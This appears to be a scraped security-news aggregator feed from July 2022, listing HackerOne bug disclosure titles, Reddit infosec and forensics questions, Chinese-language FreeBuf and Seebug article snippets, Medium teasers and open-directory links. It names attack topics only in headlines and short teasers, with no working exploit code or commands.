    GitLab disclosed a bug submitted by xanbanx: https://hackerone.com/reports/684268 - Bounty: $2500
    Undici does not use CONNECT or otherwise validate upstream HTTPS certificates when using a proxy
    Node.js disclosed a bug submitted by pimterry: https://hackerone.com/reports/1583680
    Undici ProxyAgent vulnerable to MITM
    Internet Bug Bounty disclosed a bug submitted by pimterry: https://hackerone.com/reports/1599063 - Bounty: $1000
    One Click XSS in [www.shopify.com]
    Shopify disclosed a bug submitted by comwrg: https://hackerone.com/reports/1563334 - Bounty: $500
    rubygems.org Batching attack to `confirmation_token` by bypass rate limit
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1559262 - Bounty: $480
    CVE-2021-40438 on cp-eu2.acronis.com
    Acronis disclosed a bug submitted by savik: https://hackerone.com/reports/1370731 - Bounty: $150
    [CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day
    Acronis disclosed a bug submitted by rhinestonecowboy: https://hackerone.com/reports/1425474 - Bounty: $1000
  • Open

    Affinis - Subdomain Discovery Through RNN (Recurrent Neural Network)
    submitted by /u/jibblz [link] [comments]
    Bypass Windows Defender by utilizing malicious SMB requests inside MS Word Macro
    Hope you enjoyed, learned something new and I would love to receive a feedback. https://youtu.be/A8DkVDQW1-w submitted by /u/lsecqt [link] [comments]
    Free4All Information Technology and Cyber Security Resources
    submitted by /u/cybersocdm [link] [comments]
  • Open

    Cobalt Strike Analysis and Tutorial: CS Metadata Encryption and Decryption
    We show how metadata encryption and decryption contributes to making Cobalt Strike an effective emulator that is difficult to defend against. The post Cobalt Strike Analysis and Tutorial: CS Metadata Encryption and Decryption appeared first on Unit 42.
  • Open

    Why isn't there an AppArmor alternative for Windows?
    I know Windows has Mandatory Integrity Control, but it doesn't have Mandatory Access Control like Linux does with AppArmor or SELinux. It seems like AppArmor would be useful, at least for power users so my question is: Why isn't there an AppArmor (MAC) alternative for Windows? submitted by /u/greyyit [link] [comments]
    Is it me, the company or my job?
    Hello. For a longer time I work as an ethical hacker/redteamer. Few months ago I started feeling that I do not learn anything new, I am stuck and there is no way to go for me to improve. When I come home, I have no energy to do some CTFs or start my own project. I just want to lay in my bed and listen to a podcast or video of completely different topic. In this company, we do pentests of huge corporates and many time many things go wrong - the timing, the preparedness from the side of the client, the scope. All these things touch me on very deep level, I want to deliver very professional work and do the best I can. But all of these things suck my energy. I have said many times that things need to change because otherwise we will burn out quickly, all of us. We need new stuff, something to get us inquisitive, some new challenges - not yet another scope of 1 web banking application with limited subscope of 20 API calls and 1 host. But nothing changed, the people above do not listen. All they care about is the profit. We however do sometimes get our hands on some nice projects but usually these are like a firefly in the night, very very rare. I feel like I reached my capacity of ethical hacking and would like to improve in security research and exploit development but I do not have any mentor to follow me through. And I like the money I get now because I do my job very good and can do any task I am given. Companies I have found in the market want someone already skilled enough to just throw zerodays out of the sleeve. I want to move but have no energy to do it. Is there a problem in me? Should I change my attitude (which is already against my belief) to just do the job and then go home empty and watch other things - "it is just my job, I can do anything else in my free time"? Or is it the company that is wrong? Or is it the whole ethical hacking or infosec in general? Is there any reasonable advice how to actually solve this...? Thank you for reading... submitted by /u/elvisdnb [link] [comments]
    Compromised Device - Incident Process post device containment
    Hi Guys, ​ Ive got an incident where a device has been compromised. We've managed to isolate the device, take it offline and rebuild it. Using our SIEM tool, what should I be looking at to look for signs of persistence, lateral movement or C2 communications. I can lookup the user, get everything our SIEM logs for them but then with all this information i can never make heads or tails of it... Alot of the stuff is probably normal traffic such as VPN connections, Connecting to Microsoft etc. What can i do to filter out all of this noise and find the other stuff or is that what its like for everyone? ​ Should i be looking at IoC's for that specific malware? Should i be looking at the devices activity? Do you (yes you reader) spend hours looking for persistence or do just rebuild and move on to the next ticket? ​ ​ We use LogRhythm for reference so any specific tips would be great :) ​ Please feel free to recommend books, paper, courses or videos to educate myself and of course tips on here are super helpful. *Cant really ask someone within the team as we're a very immature team with mature tooling/services so no one really knows how to do this* submitted by /u/Maidenless4ever [link] [comments]
    Is it worth paying an extra $29/yr for Keepers BreachWatch?
    Keeper says that BreachWatch monitors the dark Web for breached accounts, but is it actually effective? If it only monitors limited databases it's not particularly useful. submitted by /u/ForComputerStuff [link] [comments]
  • Open

    ‍IW Weekly #9: Web3 Hacking, Leveraging Google Dorks, Python Flaws, and more…
    No content preview
  • Open

    ‍IW Weekly #9: Web3 Hacking, Leveraging Google Dorks, Python Flaws, and more…
    No content preview
  • Open

    ‍IW Weekly #9: Web3 Hacking, Leveraging Google Dorks, Python Flaws, and more…
    No content preview
  • Open

    FreeBuf早报 | 拜登的iCloud账户疑似被黑;WPS再次回应删除用户本地文件事件
    匿名社交媒体网站4chan上的发帖者声称,他们已经进入了亨特-拜登的iCloud账户,并发布了据说是从其中提取的照片和视频。
    【漏洞分析】Drupal 远程代码执行(CVE-2017-6920)
    前几天在参加 FOFA-攻防挑战赛时,遇到了 Drupal 的盲盒漏洞环境,最终确定漏洞为 CVE-2017-6920 ,但是还是无法 getflag ,因为网上相关参考文章并不是很多...
    小菜鸡的攻防演练之旅
    最近参加了一次小型攻防演练也是我第一次参加这种活动,所以简单记录下过程。
    黑客盯上了欧洲央行行长
    欧洲中央银行行长克里斯蒂娜·拉加德遭到了一次未遂的网络攻击。
    遭受大规模DDOS 攻击,立陶宛能源公司业务被迫中断
    近期,立陶宛能源公司Ignitis Group遭受了十年来最大的网络攻击。
    微软:超1万家企业遭受钓鱼攻击
    微软表示,从2021年9月开始,已经有超过一万个组织受到网络钓鱼攻击。
    洞鉴零信任,CIS网络安全创新大会夏日版零信任安全论坛回顾
    零信任安全论坛的专家们通过干货满满的议题内容,全方位勾勒出了现今零信任的运用方案体系以及未来的发展脉络。
  • Open

    Pocsuite3 入门教程
    作者:知道创宇404实验室 时间:2022年7月13日 1 简介 Pocsuite3 是由知道创宇 404 实验室打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架,自 2015 年开源以来,知道创宇安全研究团队持续维护至今,不断更新迭代。 一些特性: 支持 verify、attack、shell 三种模式,不仅为扫描而生,也可用于其他场景,比如漏洞 exploit、获取目标的交互式...
    探寻 Java 文件上传流量层面 waf 绕过
    作者:Y4tacker 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面 无意中看到ch1ng师傅的文章觉得很有趣,不得不感叹师傅太厉害了,但我一看那长篇的函数总觉得会有更骚的东西,所幸还真的有,借此机会就发出来一探究竟,同时也不得不感慨下RFC文档的妙处,当然本文针对的技术也仅仅只是在流量层面上waf的绕过...
  • Open

    Pocsuite3 入门教程
    作者:知道创宇404实验室 时间:2022年7月13日 1 简介 Pocsuite3 是由知道创宇 404 实验室打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架,自 2015 年开源以来,知道创宇安全研究团队持续维护至今,不断更新迭代。 一些特性: 支持 verify、attack、shell 三种模式,不仅为扫描而生,也可用于其他场景,比如漏洞 exploit、获取目标的交互式...
    探寻 Java 文件上传流量层面 waf 绕过
    作者:Y4tacker 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面 无意中看到ch1ng师傅的文章觉得很有趣,不得不感叹师傅太厉害了,但我一看那长篇的函数总觉得会有更骚的东西,所幸还真的有,借此机会就发出来一探究竟,同时也不得不感慨下RFC文档的妙处,当然本文针对的技术也仅仅只是在流量层面上waf的绕过...
  • Open

    Career question about private sector
    Hi Interested in computer forensics but it seems to be dominated by le. Nothing against le but would like to enter a career where I wouldn't necessarily HAVE to go through le. So can anyone advise on what some of the private sector roles and career paths in the computer forensics field. I wouldn't mind being some sort of digital private investigator but would like to know how realistic that would be. TIA! submitted by /u/zrobb999 [link] [comments]
    What data can I pull from Echo Dot & how long before it’s overwritten by new data?
    Context: my best friend died recently and I just realized that there are a few echo dots at his house. When I told his family that it may be possible to pull audio from the echo dots, so as to provide some insight into what was happening before he died, they were very interested. I am fairly tech savvy but only have dabbled in computer forensics at a hobbyist/total novice level. That being said, is it feasible for me to attempt to grab data from my late friend’s echo dots? What’s the process? What should I be wary of, what kinds of credentials do I need etc? Thanks so much in advance. Hope my question made sense; I’m still pretty foggy mentally as I process my friend’s untimely death :( submitted by /u/feelin_weird [link] [comments]
    Volatility Help - pagefile & hiberfil
    Hi all. I've been poking around trying to analyze a pagefile and hiberfil I recovered, but for the life of me, I can't get volatility to play nice with me. So for starters, I've confirmed via the registry that the processor is AMD64 architecture and that it's Windows 10 19041.1.vb_release.191206-1406. I've tried using volatility to convert to a raw image (vol -f file.sys imagecopy -O target.raw) and no matter what profile I apply - which, ostensibly should be Win10x64_19041 - no plugins will take against it. Not in Volatility 2.6, 3.1, or 3.2. In the latter two, imagecopy is not an available plugin. I am not sure what I am doing wrong, if I am missing plugins, or what have you, but I would appreciate any guidance. I would buy Arsenal Recon's tools, but that isn't currently an option. submitted by /u/KillithidMindslayer [link] [comments]

  • Open

    Can you get malware just from entering a website?
    Not really sure as if this subreddit is the right place to ask, so if it’s not, please excuse me. So long story short, I googled “youtube” and clicked a little too fast on the top result which seemed like the official youtube link. For those asking, the link I clicked had the “ad” mentioned above it, so it was the top result and the actual official youtube link came right under. After clicking on the top link, a weird website opened that was definitely not YouTube. It clearly looked like something to scare people (e.g., your OS is infected or call this number for help in bold red letters). I’d like to know how likely it is that some malware are now on my computer resulting of this? Is it possible to get any virus only from entering a website? I didn’t click on anything after entering this website, I only took a screenshot (if people want to see) and closed everything. Thank you! submitted by /u/TangerineNo6098 [link] [comments]
    How well does CRTP teach you about pivoting and windows privilege escalation?
    in perparation for the OSCP i though about taking the CRTP, i read that it teached you pivoting and windows escalation, but how well though? like OSCP level well ? will i need other training other than it ? submitted by /u/watermelonSoundsNice [link] [comments]
    Need some advice on certifications paths to take
    I got like 700-800 $ to spend and don't know which path i should take for the best looking resume failed my OSCP exam and retake costs 250$ i'm very bad in AD and windows priv escalation so thought about taking CRTP (cert costs 250$ and videos and lab alone cost 70$) having taken the OSCP exam before, i can say the exam is horrible i and i may fail again even with CRTP so thinking about potentially taking PNPT (300$) or eCPPT (400$) i have a few routes to take , could take the CRTP cert to have a good looking cert on the resume (don't know exactly how good recruiters will look at it) or could just take the training alone for 70$ and save for another potential OSCP retake or maybe PNPT/eCPPT if things don't workout with the OSCP Kinda lost with this, will i miss out if i take the CRTP training alone without the cert ? help submitted by /u/watermelonSoundsNice [link] [comments]
    Assessing cyber resilience
    Hi all! I’ve got a question about assessing the cyber resilience of a organization. is there a standard to assess the cyber resilience? are there frameworks described? are there good books or articles about cyber resilience? Thanks in advance! submitted by /u/overigegebruiker12 [link] [comments]
  • Open

    Retbleed: Arbitrary Speculative Code Execution with Return Instructions
    submitted by /u/mstromich [link] [comments]
    How to secure Kubernetes deployment with signature verification – Cosign and Connaisseur
    submitted by /u/MiguelHzBz [link] [comments]
    Microsoft Azure Site Recovery DLL Hijacking ($10,000 Bug Bounty)
    submitted by /u/dinobyt3s [link] [comments]
    From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud
    submitted by /u/SCI_Rusher [link] [comments]
    Exploratory analysis of CVEs - Some interesting viz
    submitted by /u/10xpdev [link] [comments]
    Exploiting Authentication in AWS IAM Authenticator for Kubernetes
    submitted by /u/albinowax [link] [comments]
  • Open

    Rails Security Release CVE-2022-32224
    Article URL: https://rubyonrails.org/2022/7/12/Rails-Versions-7-0-3-1-6-1-6-1-6-0-5-1-and-5-2-8-1-have-been-released Comments URL: https://news.ycombinator.com/item?id=32075137 Points: 3 # Comments: 0
  • Open

    web漏洞挖掘利用
    注:此文章只供参考学习,各国法律明令禁止黑客非法攻击,后果自负!
    FreeBuf早报 | 美国最新公布“量子防御算法”;EDF 接受网络安全记录审查
    目前,美国国家标准与技术研究所(NIST)正式认可能抵御量子计算机攻击的四种加密算法技术,可预防未来网络攻击。
    攻击者提供虚假Offer,从 Axie Infinity 窃取5.4亿美元
    攻击者通过 LinkedIn 向 Axie Infinity 一名高级工程师提供了一份虚假Offer,盗取了该公司 5.4 亿美元。
    GitHub Actions和Azure虚拟机正在被用于云挖矿
    据The Hack News消息,GitHub Actions和Azure虚拟机 (VM) 正在被用于基于云的加密货币挖掘。这意味着,挖矿黑灰产已经开始将目光转向云资源。
    警惕Google更新,可能是勒索软件伪装
    一种新的勒索软件正以谷歌更新的形式出现在网络上,利用Windows系统的功能进行勒索攻击。
    未来五年,网络在线支付诈骗造成的损失将高达3430亿美元
    未来五年,全球在线支付诈骗造成的总损失将超过3430亿美元。
    以攻防促安全 |「CIS网络安全创新大会·夏日版」攻防论坛回顾
    作为CIS网络安全创新大会夏日版三大论坛之一,实网对抗与攻防演练专场邀请多位专家、大咖共聚一堂,从攻防视角出发,探讨企业安全新发展。
  • Open

    War in Ukraine / July 11
    Day 139: Ukraine’s economic problems Continue reading on Medium »
    No Future for the North Korea Fixer
    An indictment by US authorities against two crypto diplomats, now added to the US Most-Wanted list, sparked an #OSINT investigation Continue reading on Medium »
    Google Hacking
    Apa itu Google Dork? Continue reading on Medium »
  • Open

    From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud
    submitted by /u/SCI_Rusher [link] [comments]
    Interview with a 16-year-old Lapsus$ Hacker
    submitted by /u/cybersocdm [link] [comments]
  • Open

    SecWiki News 2022-07-12 Review
    afrog 发布新版本 Release 1.3.5 真的想你 by 胖胖的ALEX 入侵模拟攻击演练平台建设 by ourren 开源安全:挑战、解决方案和机遇 by ourren 从CICD漏洞靶场中学习持续集成安全 by ourren Bad Packet 测量在野 IoT 僵尸网络活动 by Avenger SecWiki周刊(第436期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-12 Review
    afrog 发布新版本 Release 1.3.5 真的想你 by 胖胖的ALEX 入侵模拟攻击演练平台建设 by ourren 开源安全:挑战、解决方案和机遇 by ourren 从CICD漏洞靶场中学习持续集成安全 by ourren Bad Packet 测量在野 IoT 僵尸网络活动 by Avenger SecWiki周刊(第436期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Write Up 1: Hellosign Integration [Full Read SSRF]
    بسم الله الرحمن الرحيم Continue reading on Medium »
    Multiple $50,000 Reward Tickets in Aleph Zero’s and Immunefi’s Bug Bounty Program
    Aleph Zero has decided to partner with Immunefi to deliver a bug bounty program dedicated to seeking out vulnerabilities that may hinder… Continue reading on Aleph Zero Foundation »
    Business Logic Vulnerability — REGISTRATION Using Fake Email Account & Valid Company Name
    Description: Continue reading on Medium »
    Recox v2.0 -classifying vulnerabilities in web applications
    The script’s goal is to aid in the classification of vulnerabilities in web applications. RecoX, the emerging methodology, can detect… Continue reading on Medium »
    CSRF Vulnerability
    Hello, welcome to my new article, this article will talk about how I found CSRF on the login page. First, let me introduce myself, my name… Continue reading on Medium »
    Qué es Bug Bounty y por qué es ahora utilizado también por el cibercrimen
    por Víctor Ruiz, fundador de SILIKN e instructor certificado en ciberseguridad — CSCT™. Continue reading on Medium »
  • Open

    ChromeLoader: New Stubborn Malware Campaign
    A malicious browser extension is the payload of the ChromeLoader malware family, serving as adware and an infostealer, leaking users’ search queries. The post ChromeLoader: New Stubborn Malware Campaign appeared first on Unit 42.
  • Open

    Attacking Active Directory: TryHackMe
    Today, we are up with yet a new walkthrough, but the domain is something interesting. We would be looking at a room on TryHackMe called… Continue reading on Medium »
    What is Red-Team Testing | Red Team Assessment- Komodo Cyber Security
    WHY DO YOU NEED A RED-TEAM? Continue reading on Medium »
  • Open

    Huge list of cell phone ringtones
    http://onj3.andrelouis.com/phonetones/unzipped/ submitted by /u/Buzz1ight [link] [comments]
    Another huge list of ODs! :D (31 ODs)
    https://openweb.uz/apps/ - Software http://iranfl.persiangig.com - Misc http://www.4oneworld.org/files/ - Images http://www.andrelouis.com/media/ - Music & some other stuff https://gstreamer.freedesktop.org/media/ - Video & Music (and some other stuff) http://www.geo.mtu.edu/volcanoes/boris/ - Misc http://www.narrowbandimaging.com/incoming/ - Misc https://son.rochester.edu/assets/images/ - Images http://lamborns.com/pictures/ - Images https://ww2.cs.fsu.edu/~curci/ - PDFs and Images https://ftp.tourmentine.com - Images, MP3s, Videos, and some other stuff https://natewren.com/themes/ - Images https://websitearchive2020.nepa.gov.jm/new/ - Misc https://ferry-county.com/Images/ - Images http://shortpumppourhouse.com/images/ - Images http://www.pezlist.com/mcpez/images/ - Images http://www.sckans.edu/ext/ - Misc https://otlibrary.com/wp-content/gallery/ - Images http://www.nwhiker.com/wallpaper/ - Images https://jorge.fbarr.net/files/ - Misc https://ftp.mpi-inf.mpg.de/pub/ - Misc http://www.4oneworld.org/files/ - Dead https://www.cs.cmu.edu/~quake-papers/ - Misc http://ftp.esrf.eu | ftp://ftp.esrf.eu - Misc https://hippych.com/files/ - Misc http://46.219.24.140 - Misc http://www.lookas.net/ftp/ - Software & some other stuff https://www2.census.gov https://ftp.sangoma.com - Software https://downloads.thebobsgamingnetwork.net - Minecraft server? https://www.stchur.com/personal/ - Random http://tomflahertymusic.com/mp3s/ - MP3s *New! http://penguinradio.dominican.edu - Audio & MP3s ​ Pastebin: https://pastebin.com/Np7iufPw submitted by /u/ilikemacsalot [link] [comments]
    short history documentaries, survival guides and other miscellaneous stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Dungeons and Dragons stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Rolling-PWN vulnerability affects all Honda vehicles
    Article URL: https://rollingpwn.github.io/rolling-pwn/ Comments URL: https://news.ycombinator.com/item?id=32066201 Points: 141 # Comments: 93
  • Open

    Github base action takeover which is used in `github.com/Shopify/unity-buy-sdk`
    Shopify disclosed a bug submitted by codermak: https://hackerone.com/reports/1439355 - Bounty: $800
  • Open

    nRF52 平台芯片电压毛刺注入绕过调试保护
    作者:轨道教主 原文链接:https://www.bilibili.com/read/cv17283492 漏洞原理 在nRF52芯片中为防止出现nRF51中所出现的漏洞,芯片厂加入了APPROTECT功能来防止调试接口在保护状态下被使用,此功能通过直接断开调试接口与cpu的通讯来进行实现 APPROTECT的启用为用户信息配置寄存器 (UICR)中的地址0x10001208写入0xFFF...
  • Open

    nRF52 平台芯片电压毛刺注入绕过调试保护
    作者:轨道教主 原文链接:https://www.bilibili.com/read/cv17283492 漏洞原理 在nRF52芯片中为防止出现nRF51中所出现的漏洞,芯片厂加入了APPROTECT功能来防止调试接口在保护状态下被使用,此功能通过直接断开调试接口与cpu的通讯来进行实现 APPROTECT的启用为用户信息配置寄存器 (UICR)中的地址0x10001208写入0xFFF...

  • Open

    Güvenli Olmayan Web Kameralarını bulma
    OSINT Continue reading on Medium »
    War in Ukraine / July 8–10
    👉 Overview of the activities of the Verkhovna Rada: One MP Less, Five Unapproved Initiatives and «DNA Database» Continue reading on Medium »
    Як провести OSINT-аналіз токсичної IP-адреси? (кейс)
    Як виявити токсичну IP-адресу, проаналізувати її та довести причетність до атаки. OSINT-аналіз IP. Мережева розвідка. Розслідування атак. Continue reading on KR. LABORATORIES IT BLOG »
  • Open

    [h1-2102] HTML injection in packing slips can lead to physical theft
    Shopify disclosed a bug submitted by intidc: https://hackerone.com/reports/1087122 - Bounty: $900
    [h1-2102] Stored XSS in product description via `productUpdate` GraphQL query leads to XSS at handshake-web-internal.shopifycloud.com/products/[ID]
    Shopify disclosed a bug submitted by intidc: https://hackerone.com/reports/1085546 - Bounty: $1600
    [h1-2102] Improper Access Control at https://shopify.plus/[id]/users/api in operation UpdateOrganizationUserTfaEnforcement
    Shopify disclosed a bug submitted by ramsexy: https://hackerone.com/reports/1085042 - Bounty: $950
    Improper deep link validation
    Shopify disclosed a bug submitted by fr4via: https://hackerone.com/reports/1087744 - Bounty: $600
    Collaborators and Staff members without all necessary permissions are able to create, edit and install custom apps
    Shopify disclosed a bug submitted by kun_19: https://hackerone.com/reports/1555502 - Bounty: $1900
    Theme editor `oseid` parameter is leaked to third-party services through the `Referer` header which leads to somekind of storefront password bypass.
    Shopify disclosed a bug submitted by saltymermaid: https://hackerone.com/reports/1262434 - Bounty: $500
    Able to view hackerone reports attachments
    GitLab disclosed a bug submitted by sateeshn: https://hackerone.com/reports/979787 - Bounty: $12000
    Mass Account Takeover at https://app.taxjar.com/ - No user Interaction
    Stripe disclosed a bug submitted by beerboy_ankit: https://hackerone.com/reports/1581240 - Bounty: $11500
    Getting a free delivery by singing up from "admin_@glovoapp.com"
    Glovo disclosed a bug submitted by cmuppin: https://hackerone.com/reports/1296584
    Server Side Template Injection on Name parameter during Sign Up process
    Glovo disclosed a bug submitted by battle_angel: https://hackerone.com/reports/1104349
  • Open

    leveraging the SQL injection to execute the XSS by evading CSP.
    Although it sounds silly, I am dumb enough to do this. Continue reading on Medium »
  • Open

    Paraswap Deposits 1M PSP to Their Bug Bounty via Hats Finance
    Another project extends their long term commitment to security! Shoutout to Paraswap for depositing 1M PSP tokens to their bug bounty in… Continue reading on Medium »
    Hacking on a Private Program (Salseforce crm)
    I was hunting on a private program of HackerOne so lets call it developer.target.com i found a register option so i registered there after… Continue reading on System Weakness »
    MSA Weekly 3 — “How to Approach Your Target Machine — Nmap Technique”
    Hai Hai, Salam hangat teman teman. Semoga kita senantiasa dalam perlindungan tuhan yang maha esa. Continue reading on Medium »
    Hackers Exploiting Follina Bug to Deploy Rozena Backdoor
    A newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously… Continue reading on Medium »
  • Open

    MimiKatz for Pentester: Kerberos
    This write-up will be part of a series of articles on the tool called Mimikatz which was created in the programming language C. it is The post MimiKatz for Pentester: Kerberos appeared first on Hacking Articles.
    MimiKatz for Pentester: Kerberos
    This write-up will be part of a series of articles on the tool called Mimikatz which was created in the programming language C. it is The post MimiKatz for Pentester: Kerberos appeared first on Hacking Articles.
  • Open

    SecWiki News 2022-07-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Cyber Certifications Are A Scam!
    Summary: Vendor Certifications serve the vendor more than they do the student. Skill-based certifications with written exams can’t… Continue reading on Medium »
  • Open

    hijagger: Checks all maintainers of all NPM and Pypi packages for hijackable packages through domain re-registration
    submitted by /u/FireFart [link] [comments]
    WAF from the scratch
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    photos of missile launch systems
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Lots of MMO screenshots from the early 2000s
    Marked as nsfw for occasional naughty humor + the fact that I haven't looked through everything http://www.sheffy.org/ao/ss/ submitted by /u/chloroformica [link] [comments]
  • Open

    IW Weekly #8: Cloudflare WAF, OAuth, TLS Fingerprinting, Talosplus, and more…
    No content preview
  • Open

    IW Weekly #8: Cloudflare WAF, OAuth, TLS Fingerprinting, Talosplus, and more…
    No content preview
  • Open

    IW Weekly #8: Cloudflare WAF, OAuth, TLS Fingerprinting, Talosplus, and more…
    No content preview
  • Open

    FreeBuf早报 | PyPI要求关键项目维护者使用2FA;金山回应将网文作者文稿锁定
    一位网文作者在龙的天空论坛发帖,称其写的网文文稿被金山办公软件 WPS 锁定。金山软件 WPS 官方微博7月11日下午发表声明回应。
    基于追踪标记的WAF设计思路
    本文所述WAF不仅具有传统WAF的功能,同时可识别并追踪攻击者。
    Mangatoon 数据泄露,超两千万账户受影响
    漫画阅读平台Mangatoon遭遇数据泄露事件,一名黑客窃取并曝光了超2300万名用户的账户信息。
    迪士尼Instagram和Facebook帐户被黑,并被威胁行为者发布恶意内容
    迪士尼Facebook和Instagram账户被一名自称“超级黑客”的人入侵。
    马来西亚数据合规重点解读
    马来西亚是较早践行数据保护的国家,其早于 2010年即颁布了《个人数据保护法》,规范个人数据收集、使用以及披露等行为。
    多款本田车型存在漏洞,车辆可被远程控制
    部分本田车型存在Rolling-PWN攻击漏洞,该漏洞可能导致汽车被远程控制解锁甚至是被远程启动。
    剑思庭:工控安全虽小众,但潜力无限 | TTSP安全智库专家访谈
    他从业的六年,刚好也是工控安全开始明显增长的六年。近期,他接受FreeBuf专访,谈起工控安全的发展历程以及未来的方向。
    新的 0mega 勒索软件针对企业进行双重勒索攻击
    名为“0mega”的新勒索软件针对全球组织进行双重勒索攻击,并要求受害企业支付数百万美元赎金。
  • Open

    Data Science & infosec
    Hi all, A bit background I work in a risk management role but I'm just some what starting out and got comfortable. Of course I miss the technical and programming world. That being said I want to do a data analytics/visualization project but not sure what risks or what areas of infosec would be most valuable to really any organization's CISO or IT security but also an area of infosec that has data I could use. So my question is what data related project in infosec can I do that involves data viz & analytics? I've done some research but could find up to date datasets. I also want to say that it would be cool to see deep web related stuff for example scanning forms and triggering if I get an organization's name? But maybe that's a bit too advanced Thanks! submitted by /u/ceizaralb [link] [comments]
  • Open

    EXIF - ImageUniqueID
    Hi, Does anyone have some knowledge around "ImageUniqueID" when analyzing images? I found that this id should be unique for every taken picture, but what if multiple images have the same "unique" id? Am I right in saying that two pictures that has the same "ImageUniqueID" has been captured with the same device? ​ Thankful for any response! submitted by /u/lasagne_forensics [link] [comments]
  • Open

    RCE 宝典!
    作者:ZAC安全 原文链接:https://mp.weixin.qq.com/s/gtArMfC2Xq9IEpwvu8Sszg 00 前言与基础概念 RCE全称 remote command/code execute 远程代码执行和远程命令执行,那么RCE的作用呢?就相当于我可以在你的电脑中执行任意命令,那么就可以进而使用MSF/CS上线你的主机,就可以完全控制你的电脑了,所以做渗透中,个人...
  • Open

    RCE 宝典!
    作者:ZAC安全 原文链接:https://mp.weixin.qq.com/s/gtArMfC2Xq9IEpwvu8Sszg 00 前言与基础概念 RCE全称 remote command/code execute 远程代码执行和远程命令执行,那么RCE的作用呢?就相当于我可以在你的电脑中执行任意命令,那么就可以进而使用MSF/CS上线你的主机,就可以完全控制你的电脑了,所以做渗透中,个人...

  • Open

    Homograph attack bypass cause redirection
    Vanilla disclosed a bug submitted by malek: https://hackerone.com/reports/1285245 - Bounty: $50
    Blind SSRF at packagist.maximum.nl
    Radancy disclosed a bug submitted by dk4trin: https://hackerone.com/reports/1538056 - Bounty: $75
  • Open

    Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro
    Welcome back my fellow hackers, today we are continuing the series of showcasing Red Teaming TTPs by trying to weaponize a custom C2… Continue reading on System Weakness »
    Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro
    Welcome back my fellow hackers, today we are continuing the series of showcasing Red Teaming TTPs by trying to weaponize a custom C2… Continue reading on Medium »
    Active Directory — Abusing a Kerberos Resource
    Hello Hackers! Continue reading on Medium »
  • Open

    Sandboxing python modules in your code
    No content preview
    Hunting malwares with Yara
    No content preview
  • Open

    Sandboxing python modules in your code
    No content preview
    Hunting malwares with Yara
    No content preview
  • Open

    Sandboxing python modules in your code
    No content preview
    Hunting malwares with Yara
    No content preview
  • Open

    SecWiki News 2022-07-10 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-10 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    挖矿病毒
    以下所有操作均在centos 7系统下完成!只供参考,各国禁止黑客非法攻击行为,后果自负!
    记一次真实渗透排序处发现的SQL注入学习
    快速发现sql注入并通过burp跑出数据库名的小技巧。
    Java代码审计之XSS
    XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。
    在线编程 IDE = 远程网络攻击?
    黑客通常使用受感染的机器而不是直接从个人拥有的设备发起攻击,这使他们能够隐藏其来源。
    【由浅入深_打牢基础】一文搞懂XPath 注入漏洞
    XPath的作用就是用于在XML或HTML中查找信息,就像SQL语句的作用是在数据库中查询信息一样。
    数字藏品平台清退需承担哪些责任?
    本文将从平台“格式条款”切入,探讨数字藏品平台方在退出市场时有可能承担的法律责任。
  • Open

    Identifying and verifying Chinese PLA Navy with OSINT.
    Ship recognition is still important, sailors in the navy still receive lessons in visual recognition. Yet the attention seems to be… Continue reading on Medium »
    How to organize monitoring of your reputation in the media?
    Let’s learn how to monitor our reputation background in russian online media today. Today it is becoming a must for any public person. Continue reading on Medium »
    SPY NEWS: 2022 — Week 27
    Summary of the espionage-related news stories for the Week 27 (July 3–9) of 2022. Continue reading on Medium »
    Attacks via a Representative Sample : Myths and Reality
    Imagine the situation: you are an employee of a secret service, and your task is to calculate a particularly dangerous criminal, engaged… Continue reading on Medium »
  • Open

    [Cullinan #40] How to Hack a X Series
    Cullinan 로그 #40입니다. websocket security와 Insecure File Upload 항목이 추가되었고, How to Hack a MacOS Application 항목이 추가되었습니다. 이외에 SSE 내 부족한 부분들 보강하고, NoSQL Injection과 XSS 부분 개선이 있었습니다. Change Logs New WebSocket Security Insecure File Upload How to Hack a MacOS Application Update sse, jwt, websocket 등 기술 자체에 대한 내용은 제목 통일(*** Security) SSE Security JWT Security WebSocket Security XSS > Normalized XSS 항목 추가 XSS > Bypass in JS 항목 추가 SSE > Offensive techniques > Information Disclosure 추가 SSE > Offensive techniques > SSE Address Hijacking 추가 SSE > Offensive techniques > Sending Malicious MSG 추가 SSE > Defensive techniques > Use Random Address 추가 SSE > Defensive techniques > Control to Sender 추가 NoSQL Injection > Redis Injection 페이로드 추가 How to Hack a X How to Hack a X 시리즈는 보안 테스팅/분석 메커니즘과 환경 구성에 초점을 맞춘 글 시리즈로 MacOS Application을 시작으로 Web Application, iOS, Android 등 여러가지 Device에 대한 내용으로 채워나갈 예정입니다.
  • Open

    OISF 2022
